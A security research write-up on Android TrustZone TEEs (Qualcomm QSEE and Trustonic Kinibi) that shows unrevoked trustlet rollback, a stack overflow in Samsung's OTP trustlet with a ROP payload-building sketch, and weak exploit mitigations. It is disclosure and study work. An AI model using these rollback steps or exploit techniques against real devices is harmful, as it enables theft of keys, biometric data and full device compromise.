While I do not have a sufficiently large firmware collection to perform a more in-depth analysis, previous assessments have been made regarding the number of affected devices. Regardless, it remains unknown what proportion of these devices have correctly revoked the trustlet.
As it happens, exploiting the issue on “patched” devices is extremely straightforward, and does not require any more privileges than those required by the original version of the exploit. All an attacker would need to do is place the old trustlet anywhere on the filesystem, and change the path of the trustlet in the exploit (a single string) to point at that new location (you can find an example of such an exploit here).
One might be tempted to suggest several stop-gap mitigations, such as ensuring that trustlets may only be loaded from the system partition (thus raising the bar for a would-be attacker). However, due to the design of the API used to load trustlets, this kind of path filtering is not feasible. QSEECOM, the driver provided by Qualcomm to interact with QSEE, exposes a simple API in which user-space supplies only a buffer containing the trustlet’s binary. This buffer is then passed on to TrustZone in order for the trustlet to be authenticated and subsequently loaded. Since the driver only receives a blob containing the trustlet itself, it has no “knowledge” of the filesystem path on which the trustlet is stored, making verification of that path much harder.
Of course, interaction with QSEECOM is restricted to several SELinux contexts. However, a non-exhaustive list of these includes the media server, DRM server, KeyStore, volume daemon, fingerprint daemon and more. Not a short list by any stretch…
So what about devices unaffected by the previously disclosed Widevine vulnerability? It is entirely possible that these devices are affected by other bugs; either still undiscovered, or simply not public. It would certainly be surprising if no bugs whatsoever have been found in any of the trustlets on these devices in the interim.
For example, diffing two versions of the Widevine trustlet in the Nexus 6P shows several modifications, including changes in functions related to key verification. Investigating these changes, however, would require a more in-depth analysis of Widevine and is beyond the scope of this blog post.


Putting all of the above together, it seems quite clear that device manufacturers are either unaware of the revocation features provided by Qualcomm, or are unable to use them for one reason or another.
In addition to the mechanism described above, additional capabilities exist for trustlet revocation. Specifically, on devices where a replay protected memory block (RPMB) is available, it can be utilised to store the version numbers for trustlets, instead of relying on an eFuse. In this scenario, the APP_ID OU is used to uniquely identify each trusted application, allowing for more fine-grained control over their revocation.
That being said, in order to leverage this feature, devices must be configured with a specific eFuse blown. Since we cannot easily query the status of eFuses on a large scale, it remains unknown what proportion of devices have indeed enabled this feature. Perhaps one explanation for the lack of revocation is that some devices are either lacking an RPMB, or have not blown the aforementioned eFuse in advance (blowing a fuse on a production device may be a risky operation).
What’s more, going over our firmware collection, it appears that some manufacturers have an incomplete understanding of the revocation feature. This is evidenced by the fact that several firmware images use the same APP_ID for many (and sometimes all) trusted applications, thus preventing the use of fine-grained revocation.
There are other challenges as well - for example, some vendors (such as Google) ship their devices with an unlocked bootloader. This allows users to freely load any firmware version onto the device and use it as they please. However, revoking trustlets would strip users of the ability to flash any firmware version, as once a trustlet is revoked, firmware versions containing trustlets from the previous versions would no longer pass the authentication (and would therefore fail to load). As of now, it seems that there is no good solution for this situation. Indeed, all Nexus and Pixel devices are shipped with an unlocked bootloader, and are therefore unable to make use of the trustlet revocation feature as present today.
One might be tempted once again to suggest naive solutions, such as embedding a whitelist of “allowed” trustlet hashes in the TEE OS’s kernel itself. Thus, when trustlets are loaded, they may also be verified against this list to ensure they are allowed by the current version of the TEE OS. This suggestion is not meritless, but is not robust either. For starters, it would require incrementing the version counter for the TEE OS’s image (otherwise attackers may roll back that binary as well). Therefore, this method suffers from some of the same drawbacks of the currently used approach (for starters, devices with an unlocked bootloader would be unable to utilise it). It should be noted, however, that rewriting the TEE OS’s image would generally require raw access to the filesystem, which is strictly more restrictive than the current permissions needed to carry out the attack.
Nonetheless, a better solution to this problem (rather than a stop-gap mitigation) is still needed. We hope that by underscoring all of these issues plaguing the current implementation of the revocation feature (leading to it being virtually unused for trustlet revocation), the conversation will shift towards alternate models of revocation that are more readily available to manufacturers. We also hope that device manufacturers that are able to use this feature, will be motivated to do so in the future.
Kinibi Revocation
Now, let’s set our sights on Trustonic’s Kinibi TEE. In our analysis, we’ll use the Samsung Galaxy S7 Edge (SM-G935F) - this is an Exynos-based device running Trustonic’s TEE version 310B. As we’ve already disclosed an Android privilege escalation vulnerability a few months ago, we can use that vulnerability in order to get elevated code execution within the “system_server” process on Android. This allows us greater freedom in exploring the mechanisms used in the “Normal World” related to Trustonic’s TEE.
Unfortunately, unlike Qualcomm, no documentation is available for the image authentication process carried out by Trustonic’s TEE. Be that as it may, we can still start our research by inspecting the trustlet images themselves. If we can account for every single piece of data stored in the trustlet binary, we should be able to identify the location of any version counter (assuming, of course, such a counter exists).
As we’ve mentioned before, the format used by trusted applications in Trustonic’s TEE is documented in their public header files. In fact, the format itself is called the “MobiCore Loadable Format” (MCLF), and harkens back to G&D’s MobiCore TEE, from which Trustonic’s TEE has evolved.
Using the header files and inspecting the binary in tandem, we can piece together the entire format used to store the trustlet’s metadata as well as its code and data segments. As a result, we arrive at the following layout:

[Figure: the MCLF trustlet layout - header, text and data segments, followed by an unidentified blob]
At this point, we have accounted for all but a single blob in the trustlet’s binary - indeed, as shown in the image above, following the data segment, there appears to be an opaque blob of some sort. It would stand to reason that this blob would represent the trustlet’s signature (as otherwise that would imply that unsigned trusted applications could be loaded into the TEE). However, since we’d like to make sure that all bits are accounted for, we’ll need to dig deeper and make sure that is the case.
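As a first step, we can at least parse the documented fields ourselves. The sketch below is reconstructed from the public mcLoadFormat.h headers as I recall them, so the exact offsets should be double-checked against the real header files:

import struct
import sys
import uuid

def parse_mclf(data):
    # MCLF intro: magic ("MCLF") followed by the format version.
    magic, version = struct.unpack_from('<4sI', data, 0)
    if magic != b'MCLF':
        raise ValueError('not an MCLF image')
    flags, mem_type, service_type, num_instances = struct.unpack_from('<4I', data, 8)
    ta_uuid = uuid.UUID(bytes=data[24:40])
    (driver_id, num_threads, text_va, text_len, data_va, data_len,
     bss_len, entry, service_version) = struct.unpack_from('<9I', data, 40)
    return {
        'uuid': ta_uuid,
        'service_type': service_type,
        'text': (text_va, text_len),
        'data': (data_va, data_len),
        'entry': entry,
        'service_version': service_version,
    }

print(parse_mclf(open(sys.argv[1], 'rb').read()))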
Unfortunately, there appear to be no references in the header files to a blob of this kind. With that in mind, how can we make sure that this is indeed the trustlet’s signature? To do so we’ll need to reverse engineer the loading code within the TEE OS responsible for authenticating and loading trusted applications. Once we identify the relevant code, we should be able to isolate the handling of the signature blob and deduce its format.
At this point, however, this is easier said than done. We still have no knowledge of where the TEE OS’s binary is stored, how it may be extracted, and what code is responsible for loading it into place. However, some related work has been done in the past. Specifically, Fernand Lone Sang of Quarkslab has published a two-part article on reverse-engineering Samsung’s SBOOT on the Galaxy S6. While his work is focused on analysing the code running in EL3 (which is based on ARM’s Trusted Firmware), we’re interested in dissecting the code running in S-EL1 (namely, the TEE OS).
By applying the same methodology described by Fernand, we can load the SBOOT binary from an extracted firmware image into IDA and begin analysing it. Since SBOOT is based on ARM’s Trusted Firmware architecture, all we’d need to do is follow the logic up to the point at which the TEE OS is loaded by the bootloader. This component is also referred to as “BL32” in the ARM Trusted Firmware terminology.

After reversing the relevant code flows, we finally find the location of the TEE OS’s kernel binary embedded within the SBOOT image! In the interest of brevity, we won’t include the entire process here. However, anyone wishing to extract the binary for themselves and analyse it can simply search for the string “VERSION_-+A0”, which denotes the beginning of the TEE OS’s kernel image. As for the image’s base address - by inspecting the absolute branches and the address of the VBAR in the kernel we can deduce that it is loaded into virtual address 0x7F00000.
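If you’d rather not repeat the full reversing exercise, a few lines of code suffice to carve the image out of SBOOT using the marker string mentioned above (the output file name here is just an example):

import sys

data = open(sys.argv[1], 'rb').read()
offset = data.find(b'VERSION_-+A0')  # start of the TEE OS kernel image
if offset < 0:
    sys.exit('TEE OS marker not found')
# The image is loaded at VA 0x7F00000, deduced from the absolute
# branches and the VBAR value in the kernel.
print('TEE OS found at file offset {:#x}, load address 0x7F00000'.format(offset))
open('tee_os.bin', 'wb').write(data[offset:])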
Alternatively, there exists another (perhaps much easier) way to inspect Kinibi’s kernel. It is a well known fact that Qualcomm supports the execution of not one, but two TEEs simultaneously. Samsung devices based on Qualcomm’s SoCs make use of this feature by loading both QSEE and Kinibi at the same time. This allows Samsung to access features from both TEEs on the same device. However, we’ve already seen how images loaded by Qualcomm’s image authentication module can be converted into regular ELF files (and subsequently analysed). Therefore, we can simply apply the same process to convert Kinibi’s kernel (“tbase”, as present on Samsung’s Qualcomm-based devices) into an ELF file which can then be readily analysed.
Since the file format of trusted applications running under Kinibi TEE on Qualcomm devices appears identical to the one used on Exynos, that would suggest that whatever authentication code is present in one, is also present in the other.
After some reversing, we identify the relevant logic responsible for authenticating trusted applications being loaded into Kinibi. The microkernel first verifies the arguments in the MCLF header, such as its “magic” value (“MCLF”). Next, it inspects the “service type” of the image being loaded. By following the code’s flow we arrive at the function used to authenticate both system trustlets and drivers - just what we’re after! After analysing this function’s logic, we finally arrive at the structure of the signature blob:

[Figure: structure of the signature blob]
The function extracts the public key information (the modulus and the public exponent). Then, it calculates the SHA-256 digest of the public key and ensures that it matches the public key hash embedded in the kernel’s binary. If so, it uses the extracted public key together with the embedded signature in the blob to verify the signature on the trustlet itself (which is performed on its entire contents up to the signature blob). If the verification succeeds, the trustlet is loaded.
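In pseudo-Python, that authentication logic boils down to the following (parse_signature_blob and rsa_verify are hypothetical helpers standing in for the blob layout and RSA routine recovered by reversing):

import hashlib

def authenticate_trustlet(image, embedded_pubkey_hash, sig_blob_offset):
    body, blob = image[:sig_blob_offset], image[sig_blob_offset:]
    # Extract the public key (modulus and exponent) and the signature
    # from the blob; the exact layout comes from reversing.
    modulus, exponent, signature = parse_signature_blob(blob)
    # The SHA-256 of the embedded public key must match the hash baked
    # into the TEE OS kernel's binary.
    if hashlib.sha256(modulus + exponent).digest() != embedded_pubkey_hash:
        return False
    # The signature covers the trustlet's entire contents up to the blob.
    return rsa_verify(modulus, exponent, signature, body)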
At long last, we are finally able to account for every single bit in the trustlet. But… Something appears to be amiss - where is the version counter located? Out of the entire trustlet’s binary, there is but a single value which may serve this purpose -- the “Service Version” field in the MCLF header. However, it certainly doesn’t seem like this value is being used by the loading logic we traced just a short while ago. Nevertheless, it’s possible that we’ve simply missed some relevant code.
Regardless, we can check whether any revocation using this field is taking place in practice by leveraging our firmware collection once again! Let’s write a short script to extract the service version field from every trusted application and run it against the firmware repository…
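Reusing the parse_mclf sketch from earlier, the scan amounts to a few lines (the “.tlbin” extension is assumed to be the registry’s file naming convention):

import pathlib
import sys

for path in pathlib.Path(sys.argv[1]).rglob('*.tlbin'):
    header = parse_mclf(path.read_bytes())
    print('{} ({}): serviceVersion={}'.format(
        header['uuid'], path.name, header['service_version']))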
...And the results are in! Every single trusted application in my firmware repository appears to use the same version value - “0”. While there are some drivers that use a different value, it appears to be consistent across devices and firmware versions (and therefore doesn’t seem to represent a value used for incremental versions or for revocation). All in all, it certainly seems as though no revocation is taking place.
But that’s still not quite enough. To ensure that no revocation is performed, we’ll need to try it out for ourselves by loading a trustlet from an old firmware version into a more recent one.
To do so, we’ll need to gain some insight into the user-mode infrastructure provided by Trustonic. Let’s follow the execution flow through the process of loading a trustlet - starting at the “Normal World” and ending in the “Secure World”’s TEE. Doing so will help us figure out which user-mode components we’ll need to interact with in order to load our own trustlet.
When a privileged user-mode process wishes to load a trusted application, they do so by sending a request to a special daemon provided by Trustonic - “mcDriverDaemon”. This daemon allows clients to issue requests to the TEE (which are then routed to Trustonic’s TEE driver). One such command can be used to load a trustlet into the TEE.
The daemon may load trustlets from one of two paths - either from the system partition ("/system/app/mcRegistry"), or from the data partition ("/data/app/mcRegistry"). Since in our case we would like to avoid modifying the system partition, we will simply place our binary in the latter path (which has an SELinux context of “apk_data_file”).
While the load request itself issued to the daemon specifies the UUID of the trustlet to be loaded, the daemon only uses the UUID to locate the binary, but does not ensure that the given UUID matches the one encoded in the trustlet's header. Therefore, it’s possible to load any trustlet (regardless of UUID) by placing a binary with an arbitrary UUID (e.g., 07050501000000000000000000000020) in the data partition's registry directory, and subsequently sending a load request with the same UUID to the daemon.
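In practice, staging the binary amounts to nothing more than a file copy (the “.tlbin” naming convention is assumed here, and the file names are illustrative):

import shutil

# Drop an old trustlet into the data partition's registry under an
# arbitrary UUID; the daemon will happily load it when asked for that UUID.
shutil.copy('otp_trustlet_old.tlbin',
            '/data/app/mcRegistry/07050501000000000000000000000020.tlbin')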

Lastly, the communication with the daemon is done via a UNIX domain socket. The socket has an SELinux context which limits the number of processes that can connect to it. Nonetheless, much like in Qualcomm’s case, the list of such processes seems to include the majority of privileged processes running on the system. Indeed, a very partial list includes the DRM server, system server, the volume daemon, mediaserver, and indeed any system application (you can find the full list in the issue tracker).
From then on, the daemon simply contacts Trustonic’s driver and issues a specific set of ioctls which cause it to pass the request on to the TEE. It should be noted that access to the driver is also available to quite a wide range of processes (once again, the full list can be seen in the issue tracker).
Now that we’re sufficiently informed about the loading process, we can go ahead and attempt to load an old trustlet. Let’s simply take an old version of the “fingerprint” trustlet and place it into the registry directory under the data partition. After issuing a load request to the daemon and following the dmesg output, we are greeted with the following result:

[dmesg output indicating the old trustlet was accepted and loaded by the TEE]
There we have it -- the trustlet has been successfully loaded into the TEE, confirming our suspicions!
After contacting Samsung regarding this issue, we’ve received the following official response:
“Latest Trustonic kinibi 400 family now supports rollback prevention feature for trustlets and this is fully supported since Galaxy S8/S8+ devices”
Indeed, it appears that the issue has been addressed in the newest version of Trustonic’s TEE - Kinibi 400. Simply searching for relevant strings in the TEE OS binary provided in the Galaxy S8’s firmware reveals some possible hints as to the underlying implementation:

Based on these strings alone, it appears that newer devices utilise a replay protected memory block (RPMB) in order to prevent old trustlets from being rolled back. As the implementation is proprietary, more research is needed in order to determine how this feature is implemented.
With regards to Samsung devices - although revocation appears to be supported in the Galaxy S8 and S8 Plus, all other Exynos-based devices remain vulnerable to this issue. In fact, in the next part we’ll write an exploit for a TEE vulnerability. As it happens, this same vulnerability is present in several different devices, including the Galaxy S7 Edge and Galaxy S6.
Without specialised hardware used to store the version counter or some other identifier which can be utilised to prevent rollback, it seems like there is not much that can be done to address the issue in older devices. Nonetheless, as we have no visibility into the actual security components on the SoC, it is not clear whether a fix is indeed not possible. Perhaps other hardware components could be co-opted to implement some form of revocation prevention. We remain hopeful that a stop-gap mitigation may be implemented in the future.

Deciding On A Target
To make matters more interesting, let’s try and identify an “old” vulnerable trustlet (one which has already been “patched” in previous versions). Once we find such a trustlet, we could simply insert it into the registry and load it into the TEE. As it happens, finding such trustlets is rather straightforward - all we have to do is compare the trustlets from the most recent firmware version with the ones in the first version released for a specific device -- if there have been any security-relevant fixes, we should be able to track them down.
In addition, we may also be able to use vulnerable trustlets from a different device. This would succeed only if both devices share the same “trusted” public key hash embedded in the TEE OS. To investigate whether such scenarios exist, I’ve written another script which extracts the modulus from each trustlet binary, and groups together different firmware versions and devices that share the same signing key. After running this script, it appears that both the Galaxy S7 Edge (G935F) and the Galaxy S7 (G930F) use the same signing key. As a result, attackers can load trustlets from either device into the other (thereby expanding the list of possible vulnerable trustlets that can be leveraged to attack the TEE).
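The grouping logic can reuse the hypothetical parse_signature_blob helper from before (here assumed to locate the trailing blob within the image itself); hashing each modulus gives us a stable identifier for the signing key:

import hashlib
import pathlib
import sys
from collections import defaultdict

signing_keys = defaultdict(set)
for path in pathlib.Path(sys.argv[1]).rglob('*.tlbin'):
    # parse_signature_blob: hypothetical helper from the earlier sketch.
    modulus, exponent, signature = parse_signature_blob(path.read_bytes())
    # Group the firmware dumps (one directory per device/version) by key.
    signing_keys[hashlib.sha256(modulus).hexdigest()].add(str(path.parent))

for key_hash, firmwares in sorted(signing_keys.items()):
    print(key_hash[:16], sorted(firmwares))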
After comparing a few trusted applications against their older versions, it is immediately evident that there’s a substantial number of security-relevant fixes. For example, a cursory comparison between the two versions of the “CCM” trustlet (FFFFFFFF000000000000000000000012) revealed four added bounds checks which appear to be security-relevant.


Alternately, we can draw upon previous research. Last year, while doing some cursory research into the trusted applications available on Samsung’s Exynos devices, I discovered a couple of trivial vulnerabilities in the “OTP” trustlet running under that platform. These vulnerabilities have since been “fixed”, but as the trustlets are not revoked, we can still freely exploit them.
In fact, let’s do just that.

Writing A Quick Exploit
We’ve already determined that old trustlets can be freely loaded into Kinibi TEE (prior to version 400). To demonstrate the severity of this issue, we’ll exploit one of two vulnerabilities I’ve discovered in the OTP trustlet late last year. Although the vulnerability has been “patched”, attackers can simply follow the steps above to load the old version of the trustlet into the TEE and exploit it freely.  
The issue we’re going to exploit is a simple stack overflow. You might rightly assume that such an overflow would be stopped by modern exploit mitigations. However, looking at the binary, it appears that no such mitigation is present! As we’ll see later on, this isn’t the only mitigation currently missing from Kinibi.
Getting back to the issue at hand, let’s start by understanding the primitive at our disposal. The OTP trustlet allows users to generate OTP tokens using embedded keys that are “bound” to the TrustZone application. Like most other trusted applications, its code generally consists of a simple loop which waits for notifications from the TEE OS informing it of an incoming command.
Once a command is issued by a user in the “Normal World”, the TEE OS notifies the trusted application, which subsequently processes the incoming data using the “process_cmd” function. Reversing this function we can see the trustlet supports many different commands. Each command is assigned a 32-bit “command ID”, which is placed at the beginning of the user’s input buffer.
Following the code for these commands, it is quickly apparent that many of them use a common utility function, “otp_unwrap”, in order to take a user-provided OTP token and decrypt it using the TEE’s TrustZone-bound unwrapping mechanism.
This function receives several arguments, including the length of the buffer to be unwrapped. However, it appears that in most call-sites, the length argument is taken from a user-controlled portion of the input buffer, with no validation whatsoever. As the buffer is first copied into a stack-allocated buffer, this allows us to simply overwrite the stack frame with controlled content. To illustrate the issue, let’s take a look at the placement of items in the buffer for a valid unwrap command, versus their location on the stack when copied by “otp_unwrap”:

[Figure: layout of the unwrap command buffer, versus its placement on the stack in “otp_unwrap”]
As we’ve mentioned, the “Token Length” field is not validated and is entirely attacker-controlled. Supplying an arbitrarily large value will therefore result in a stack overflow. All that’s left now is to decide on a stack alignment using which we can overwrite the return address at the end of the stack frame and hijack the control flow. For the sake of convenience, let’s simply return directly from “otp_unwrap” to the main processing function - “process_cmd”. To do so, we’ll overwrite all the stack frames in-between the two functions.
As an added bonus, this allows us to utilise the stack space available between the two stack frames for the ROP of our choice. Choosing to be conservative once again, we’ll elect to write a ROP chain that simply prepares the arguments for a function, executes it, and returns the return value back to “process_cmd”. That way, we gain a powerful “execute-function-in-TEE” primitive, allowing us to effectively run arbitrary code within the TEE. Any read or write operations can be delegated to read and write gadgets, respectively - allowing us to interact with the TEE’s address space. As for interactions with the TEE OS itself (such as system calls), we can directly invoke any function in the trusted application’s address space as if it were our own, using the aforementioned “execute-function” primitive.
Lastly, it’s worth mentioning that the stack frames in the trusted application are huge. In fact, they’re so big that there’s no need for a stack pivot in order to fit our ROP chain in memory (which is just as well, as a short search for one yielded no obvious results). Instead, we can simply store our chain on the stack frames leading from the vulnerable function all the way up to “process_cmd”.
Part of the reason for the exorbitantly large stack frames is the fact that most trusted applications do not initialise or use a heap for dynamic memory allocation. Instead, they rely solely on global data structures for stateful storage, and on the large stack for intermediate processing. Using the stack in such a way increases the odds of overflows occurring on the stack (rather than the non-existent heap). Recall that as there’s no stack cookie present, this means that many such issues are trivially exploitable.
Once we’ve finished mapping out the stack layout, we’re more-or-less ready to exploit the issue. All that’s left is to build a stack frame which overwrites the stored LR register to point at the beginning of our ROP chain’s gadgets, followed by a sequence of ROP gadgets needed to prepare arguments and call a function. Once we’re done, we can simply fill the rest of the remaining space with POP-sleds (that is, “POP {PC}” gadgets), until we reach “process_cmd”’s stack frame. Since that last frame restores all non-scratch registers, we don’t have to worry about restoring state either.
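To tie it all together, here is a heavily hedged sketch of the payload construction. Every command ID, offset and gadget address below is a placeholder for values recovered by reversing the trustlet and mcLib; the real exploit is linked below.

import struct

CMD_UNWRAP    = 0x0         # placeholder: command ID of the unwrap command
DIST_TO_LR    = 0x1000      # placeholder: bytes from the copied buffer to the saved LR
CALL_GADGET   = 0x07D01234  # placeholder: "load args and call function" gadget in mcLib
POP_PC_GADGET = 0x07D05678  # placeholder: "POP {PC}" gadget used for the sled

def build_payload(func_addr, args, sled_words=64):
    # An oversized "Token Length" field triggers the overflow in otp_unwrap.
    buf = struct.pack('<II', CMD_UNWRAP, 0xFFFF)
    buf += b'A' * DIST_TO_LR                 # filler up to the saved LR
    buf += struct.pack('<I', CALL_GADGET)    # overwritten return address
    for word in list(args) + [func_addr]:    # data consumed by the call gadget
        buf += struct.pack('<I', word)
    # POP {PC} sled covering the frames up to process_cmd.
    buf += struct.pack('<I', POP_PC_GADGET) * sled_words
    return buf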

You can find the full exploit code here. Note that the code produces a position-independent binary blob which can be injected into a sufficiently privileged process, such as “system_server”.

Security Mitigations
We’ve already seen how a relatively straightforward vulnerability can be exploited within Kinibi’s TEE. Surprisingly, it appeared that there were few mitigations in place holding us back. This is no coincidence. In order to paint a more complete picture, let’s take a moment to assess the security mitigations provided by each TEE. We’ll perform our analysis by executing code within the TEE and exploring it from the vantage point of a trustlet. To do so, we’ll leverage our previously written code-execution exploits for each platform. Namely, this means we’ll explore Kinibi version 310B as present on the Galaxy S7 Edge, and QSEE as present on the Nexus 6.

ASLR

Kinibi offers no form of ASLR. In fact, all trustlets are loaded at a fixed address (denoted in the MCLF header). Moreover, as the trustlets’ base address is quite low (0x1000), this raises the probability of offset-from-NULL dereference issues being exploitable.
Additionally, each trustlet is provided with a common “helper” library (“mcLib”). This library acts as a shim which provides trusted applications with the stubs needed to call each of the functions supported by the TEE’s standard libraries. It contains a wealth of code, including gadgets to call functions, gadgets that invoke the TEE OS’s syscalls, perform message-passing and much more. And, unfortunately, this library is also mapped at a constant address in the virtual address space of each trustlet (0x7D01000).

Putting these two facts together, this means that any vulnerability found within a trustlet running under Trustonic’s TEE can therefore be exploited without requiring prior information about the address-space of the trustlet (thus lowering the bar for remotely exploitable bugs).
So what about Qualcomm’s TEE? Well, QSEE does indeed provide a form of ASLR for all trustlets. However, it is far from ideal - in fact, instead of utilising the entire virtual address space, each trustlet’s VAS simply consists of a flat mapping of a small segment of physical memory into which it is loaded.
Indeed, all QSEE trustlets are loaded into the same small physically contiguous range of memory carved out of the device’s main memory. This region (referred to as the “secapp-region” in the device tree) is dedicated to the TEE, and protected against accesses from the “Normal World” by utilising special security hardware on the SoC. Consequently, the larger the “secapp” region, the less memory is available to the “Normal World”.
The “secapp” region commonly spans around 100MB in size. Since, as we’ve noted before, a QSEE trustlet’s VAS consists of a flat mapping, the amount of entropy offered by QSEE’s ASLR implementation is limited by the “secapp” region’s size. Therefore, while many devices can theoretically utilise a 64-bit virtual address space (allowing for high-entropy ASLR), the ASLR offered by QSEE is limited to approximately 9 bits (therefore with 355 guesses an attacker would have a 50% chance of correctly guessing the base address, since (1 - 1/512)^355 ≈ 0.5). This is further aided by the fact that whenever an illegal access occurs within the TEE, the TEE OS simply crashes the trustlet, allowing the attacker to reload it and attempt to guess the base address once again.

Stack Cookies and Guard Pages
What about other exploit mitigations? Well, one of the most common mitigations is the inclusion of a stack cookie - a unique value which can be used to detect instances of stack smashing and abort the program’s execution.
Analysing the trustlets present on Samsung’s devices and running under Trustonic’s TEE reveals that no such protection is present. As such, every stack buffer overflow in a trusted application can be trivially exploited by an attacker (as we’ve seen above) to gain code execution. This is in contrast to QSEE, whose trustlets include randomised pointer-sized stack cookies.
Lastly, what about protecting the mutable data segments available to each trustlet - such as the stack, heap and globals? Modern operating systems tend to protect these regions by delimiting them with “guard pages”, thus preventing attackers from using an overflow in one structure in order to corrupt the other.
However, Trustonic’s TEE seems to carve both the globals and the stack from the trustlet’s data segment, without providing any guard page in between. Furthermore, the stack is located at the end of the data segment, and global data structures are placed before it. This layout is ideal for an attacker wishing to either overflow the stack into the globals, or vice-versa.
Similarly, Qualcomm’s TEE does not provide guard pages between the globals, heap and stack - they are all simply carved out of the single data segment provided to the trustlet. As a result, an overflow in any of these data structures can be used to target the others.

TEEs As A High Value Target
At this point, it is probably clear enough that compromising TEEs on Android is a relatively straightforward task. Since both TEEs lag behind in terms of exploit mitigations, it appears that the bar for exploitability of vulnerabilities, once found, is rather low.
Additionally, as more and more trusted applications are added, finding a vulnerability in the first place is becoming an increasingly straightforward task. Indeed, simply listing the number of trusted applications on the Galaxy S8, we can see that it contains no fewer than 30 trustlets!

Be that as it may, one might rightly wonder what the possible implications of code-execution within the TEE are. After all, if compromising the TEE does not assist attackers in any way, there may be no reason to further secure it.
To answer this question, we’ll see how compromising the TEE can be an incredibly powerful tool, allowing attackers to fully subvert the system in many cases.
In Qualcomm’s case, one of the system-calls provided by QSEE allows any trustlet to map in physical memory belonging to the “Normal World” as it pleases. As such, this means any compromise of a QSEE trustlet automatically implies a full compromise of Android as well. In fact, such an attack has been demonstrated in the past. Once code execution is gained in the context of a trustlet, it can scan the physical address space for the Linux Kernel, and once found can patch it in memory to introduce a backdoor.
And what of Trustonic’s TEE? Unlike QSEE’s model, trustlets are unable to map-in and modify physical memory. In fact, the security model used by Trustonic ensures that trustlets aren’t capable of doing much at all. Instead, in order to perform any meaningful operation, trustlets must send a request to the appropriate “driver”. This design is conducive to security, as it essentially forces attackers to either compromise the drivers themselves, or find a way to leverage their provided APIs for nefarious means. Moreover, as there aren’t as many drivers as there are trustlets, it would appear that auditing all the drivers in the TEE is indeed feasible.
Although trustlets aren’t granted different sets of “capabilities”, drivers can distinguish between the trusted applications requesting their services by using the caller’s UUID. Essentially, well-written drivers can verify that whichever application consumes their services is contained within a “whitelist”, thus minimising the exposed attack surface.
Sensitive operations, such as mapping-in and modifying physical memory are indeed unavailable to trusted applications. They are, however, available to any driver. As a result, driver authors must be extremely cautious, lest they unintentionally provide a service which can be abused by a trustlet.
Scanning through the drivers provided on Samsung’s Exynos devices, we can see a variety of standard drivers provided by Trustonic, such as the cryptographic driver, the “Trusted UI” driver, and more. However, among these drivers are a few additional drivers authored by Samsung themselves.
One such example is the TIMA driver (UUID FFFFFFFFD0000000000000000000000A), which is used to facilitate Samsung’s TrustZone-based Integrity Measurement Architecture. In short, a component of TIMA performs periodic scans of the kernel’s memory in order to ensure that it is not tampered with.
Samsung has elected to split TIMA’s functionality in two; the driver mentioned above provides the ability to map in physical memory, while an accompanying trusted application consumes these services in order to perform the integrity measurements themselves. In any case, the end result is that the driver exposes APIs to read and write physical memory - a capability normally reserved for drivers alone - to trusted applications.
Since this functionality could be leveraged by attackers, Samsung has rightly decided to enforce a UUID whitelist in order to prevent access by arbitrary trusted applications. Reversing the driver’s code, we can see that the whitelist of allowed trusted applications is embedded within the driver. Quite surprisingly, however, it is no short list!

Perhaps the take-away here is that having a robust security architecture isn’t helpful unless it is enforced across-the-board. Adding drivers exposing potentially sensitive operations to a large number of trustlets negates these efforts.
Of course, apart from compromising the “Normal World”, the TEE itself holds many pieces of sensitive information which should remain firmly beyond an attacker’s reach. This includes the KeyMaster keys (used for Android’s full disk encryption scheme), DRM content decryption keys (including Widevine) and biometric identifiers.

Afterword
While the motivation behind the inclusion of TEEs in mobile devices is positive, the current implementations are still lacking in many regards. The introduction of new features and the ever-increasing number of trustlets result in a dangerous expansion of the TCB. This fact, coupled with the current lack of exploit mitigations in comparison to those offered by modern operating systems, makes TEEs a prime target for exploitation.
We’ve also seen that many devices lack support for revocation of trusted applications, or simply fail to do so in practice. As long as this remains the case, flaws in TEEs will be that much more valuable to attackers, as vulnerabilities, once found, compromise the device’s TEE indefinitely.
Lastly, since in many cases TEEs enjoy a privileged vantage point, compromising the TEE may compromise not only the confidentiality of the information processed within it, but also the security of the entire device.
